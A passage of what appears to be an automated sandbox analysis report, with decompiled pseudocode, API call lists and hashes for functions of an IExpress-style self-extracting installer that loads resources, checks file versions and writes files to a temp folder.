                                                                                                                                                                                                                                              							_t87 = _v20;
                                                                                                                                                                                                                                              							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                              								goto L18;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                              							if(_t103 != 0) {
                                                                                                                                                                                                                                              								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                              								_v36 = _t73;
                                                                                                                                                                                                                                              								if(_t73 != 0) {
                                                                                                                                                                                                                                              									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                              										L15:
                                                                                                                                                                                                                                              										GlobalUnlock(_t103);
                                                                                                                                                                                                                                              										_t99 = _v16;
                                                                                                                                                                                                                                              										L18:
                                                                                                                                                                                                                                              										_t87 = _t87 + 1;
                                                                                                                                                                                                                                              										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                              										_v20 = _t87;
                                                                                                                                                                                                                                              										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                              										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                              											continue;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L19;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t79 = _v44;
                                                                                                                                                                                                                                              										_t88 = _t106;
                                                                                                                                                                                                                                              										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                              										_t101 = _v28;
                                                                                                                                                                                                                                              										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                              										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                              										_t97 = _v48;
                                                                                                                                                                                                                                              										_v36 = _t83;
                                                                                                                                                                                                                                              										_t109 = _t83;
                                                                                                                                                                                                                                              										do {
                                                                                                                                                                                                                                              											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00972A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                              											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00972A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                              											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                              											_t88 = _t88 + 4;
                                                                                                                                                                                                                                              										} while (_t88 < 8);
                                                                                                                                                                                                                                              										_t87 = _v20;
                                                                                                                                                                                                                                              										_t106 = 0;
                                                                                                                                                                                                                                              										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                              											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                              												GlobalUnlock(_t103);
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												goto L15;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L15;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L20:
                                                                                                                                                                                                                                              				 *_a8 = _t87;
                                                                                                                                                                                                                                              				if(_t103 != 0) {
                                                                                                                                                                                                                                              					GlobalFree(_t103);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t106;
                                                                                                                                                                                                                                              			}

































                                                                                                                                                                                                                                              0x009729bd
                                                                                                                                                                                                                                              0x009729c3
                                                                                                                                                                                                                                              0x009729cc
                                                                                                                                                                                                                                              0x009729d5
                                                                                                                                                                                                                                              0x009729d7
                                                                                                                                                                                                                                              0x009729da
                                                                                                                                                                                                                                              0x009729dd
                                                                                                                                                                                                                                              0x009729df
                                                                                                                                                                                                                                              0x009729ec
                                                                                                                                                                                                                                              0x009729f8
                                                                                                                                                                                                                                              0x009729fc
                                                                                                                                                                                                                                              0x009729ff
                                                                                                                                                                                                                                              0x00972a02
                                                                                                                                                                                                                                              0x00972a07
                                                                                                                                                                                                                                              0x00972a0a
                                                                                                                                                                                                                                              0x00972a0f
                                                                                                                                                                                                                                              0x00972a19
                                                                                                                                                                                                                                              0x00972a81
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972a0f
                                                                                                                                                                                                                                              0x0097298c
                                                                                                                                                                                                                                              0x00972974
                                                                                                                                                                                                                                              0x00972962
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097294f
                                                                                                                                                                                                                                              0x00972912
                                                                                                                                                                                                                                              0x00972a65
                                                                                                                                                                                                                                              0x00972a68
                                                                                                                                                                                                                                              0x00972a6c
                                                                                                                                                                                                                                              0x00972a6f
                                                                                                                                                                                                                                              0x00972a6f
                                                                                                                                                                                                                                              0x00972a7d

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00972A6F
                                                                                                                                                                                                                                                • Part of subcall function 00972773: CharUpperA.USER32(694569F9,00000000,00000000,00000000), ref: 009727A8
                                                                                                                                                                                                                                                • Part of subcall function 00972773: CharNextA.USER32(0000054D), ref: 009727B5
                                                                                                                                                                                                                                                • Part of subcall function 00972773: CharNextA.USER32(00000000), ref: 009727BC
                                                                                                                                                                                                                                                • Part of subcall function 00972773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00972829
                                                                                                                                                                                                                                                • Part of subcall function 00972773: RegQueryValueExA.ADVAPI32(?,00971140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00972852
                                                                                                                                                                                                                                                • Part of subcall function 00972773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00972870
                                                                                                                                                                                                                                                • Part of subcall function 00972773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009728A0
                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00973938,?,?,?,?,-00000005), ref: 00972958
                                                                                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 00972969
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00973938,?,?,?,?,-00000005,?), ref: 00972A21
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00972A81
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3949799724-0
                                                                                                                                                                                                                                              • Opcode ID: 2ae8872879f680938a9df75b40618692ef027882c84192de252b1a1b1df1ef80
                                                                                                                                                                                                                                              • Instruction ID: 7800b7eb652fb1183a55af6f8bdef61849582ad1ca66c62dcdff12ea80c3ccf3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ae8872879f680938a9df75b40618692ef027882c84192de252b1a1b1df1ef80
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9512C32E10219DFCF25CF98C884AAEFBB9FF88700F14802AE919E3251D7319941DB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 32%
                                                                                                                                                                                                                                              			E00974169(void* __eflags) {
                                                                                                                                                                                                                                              				int _t18;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 = E0097468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                              				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                                                                              					if(E0097468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                              						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                              							L7:
                                                                                                                                                                                                                                              							return LocalFree(_t21);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(0x40);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(_t21);
                                                                                                                                                                                                                                              						_t18 = 0x3e9;
                                                                                                                                                                                                                                              						L6:
                                                                                                                                                                                                                                              						E009744B9(0, _t18);
                                                                                                                                                                                                                                              						goto L7;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_push(0x10);
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_t18 = 0x4b1;
                                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E009744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              			}





                                                                                                                                                                                                                                              0x009741bd
                                                                                                                                                                                                                                              0x009741be
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009741be
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,009730B4), ref: 00974189
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,009730B4), ref: 009741E7
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                              • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                              • Opcode ID: fa11f50ca5b34bf8e42dac7b6275fe0386980bafb340894aa5da851297863462
                                                                                                                                                                                                                                              • Instruction ID: c2affcc95bd9d1976d1493f02d655c74dad2f743ef6cb0134f6cc53c63321d8d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa11f50ca5b34bf8e42dac7b6275fe0386980bafb340894aa5da851297863462
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6901F4B33082243BF32426694C86F7F218EDBE5B99F40C435B70DE1192DB68CC415179
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E009719E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v520;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                                                              				struct HWND__* _t34;
                                                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __edi;
                                                                                                                                                                                                                                              				_t27 = __ebx;
                                                                                                                                                                                                                                              				_t11 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                              				_t34 = _a4;
                                                                                                                                                                                                                                              				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                                                                                                              					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                              					E009743D0(_t34, _t15);
                                                                                                                                                                                                                                              					_v520 = 0;
                                                                                                                                                                                                                                              					LoadStringA( *0x979a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                              					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					if(_t14 != 1) {
                                                                                                                                                                                                                                              						L4:
                                                                                                                                                                                                                                              						_t23 = 0;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t32 = _a12;
                                                                                                                                                                                                                                              						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                                              							_t23 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                              			}














                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00971A18
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00971A24
                                                                                                                                                                                                                                              • LoadStringA.USER32(?,?,00000200), ref: 00971A4F
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00971A62
                                                                                                                                                                                                                                              • MessageBeep.USER32(000000FF), ref: 00971A6A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1273765764-0
                                                                                                                                                                                                                                              • Opcode ID: 41046b2a281515b6276a92d901511d52f39e9c625ece3fcba5a481d92f66b00b
                                                                                                                                                                                                                                              • Instruction ID: 1858f29ed0258d09a35a50539cde00a023d2a65671044e9ed1f47a1201331cec
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41046b2a281515b6276a92d901511d52f39e9c625ece3fcba5a481d92f66b00b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3811E5336191099FDB04EF68DE08AAE77B8FF89700F408160F51A92190CA309E40DB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                                                                                                              			E009763C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				long _v272;
                                                                                                                                                                                                                                              				void* _v276;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                                                                              				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t15 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                              				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_v276 = _a16;
                                                                                                                                                                                                                                              				_t37 = 1;
                                                                                                                                                                                                                                              				E00971781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                              				E0097658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                              				_t28 = 0;
                                                                                                                                                                                                                                              				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                              				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                              					_t28 = _a4;
                                                                                                                                                                                                                                              					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                              						 *0x979124 = 0x80070052;
                                                                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					CloseHandle(_t39);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					 *0x979124 = 0x80070052;
                                                                                                                                                                                                                                              					_t37 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                              			}

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0097642D
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0097645B
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0097647A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 009763EB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                              • API String ID: 1065093856-305352358
                                                                                                                                                                                                                                              • Opcode ID: acc308a59496e7458164f14204301fc40b5b9fe2bd99b20043c9330e97cbadcc
                                                                                                                                                                                                                                              • Instruction ID: a5e770802a417c31625ddd81d1647c29c5f5d11755d40b18daf715ba8b652853
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: acc308a59496e7458164f14204301fc40b5b9fe2bd99b20043c9330e97cbadcc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B21D273A04218ABDB10DF25DC85FEB77ACEB85314F0081A9F589A3290DAB45DC48FA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E009747E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                                                                              				intOrPtr _t9;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                                                              				intOrPtr* _t22;
                                                                                                                                                                                                                                              				void _t24;
                                                                                                                                                                                                                                              				struct HWND__* _t25;
                                                                                                                                                                                                                                              				struct HWND__* _t26;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				intOrPtr* _t28;
                                                                                                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                                                                                                              				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                              				if(_t34 != 0) {
                                                                                                                                                                                                                                              					_t22 = _t33;
                                                                                                                                                                                                                                              					_t27 = _t22 + 1;
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t6 =  *_t22;
                                                                                                                                                                                                                                              						_t22 = _t22 + 1;
                                                                                                                                                                                                                                              					} while (_t6 != 0);
                                                                                                                                                                                                                                              					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                              					 *_t34 = _t24;
                                                                                                                                                                                                                                              					if(_t24 != 0) {
                                                                                                                                                                                                                                              						_t28 = _t33;
                                                                                                                                                                                                                                              						_t19 = _t28 + 1;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t9 =  *_t28;
                                                                                                                                                                                                                                              							_t28 = _t28 + 1;
                                                                                                                                                                                                                                              						} while (_t9 != 0);
                                                                                                                                                                                                                                              						E00971680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                              						_t11 =  *0x9791e0; // 0x3077270
                                                                                                                                                                                                                                              						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                              						 *0x9791e0 = _t34;
                                                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t25 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              					E009744B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                              					LocalFree(_t34);
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t26 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              				E009744B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                                                              			}
















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00974E6F), ref: 009747EA
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00974823
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00974847
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00974851
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                              • API String ID: 359063898-305352358
                                                                                                                                                                                                                                              • Opcode ID: e4e08dadd61b462910d6efed859fb8db3eb57f517c27bad1843776e12b2079f0
                                                                                                                                                                                                                                              • Instruction ID: 2ae9101b98ea9b8c7c8738ffaf5aa85355d62ead67e7dd48f334f53d9bd2218a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4e08dadd61b462910d6efed859fb8db3eb57f517c27bad1843776e12b2079f0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 171125772086416FE7149F249C18FB73BAAEBC5300B04C919FA8A8B342EB358C06D760
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00973680(void* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				struct tagMSG _v36;
                                                                                                                                                                                                                                              				int _t8;
                                                                                                                                                                                                                                              				struct HWND__* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                                                                                                              				_t16 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                              					if(_t8 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						do {
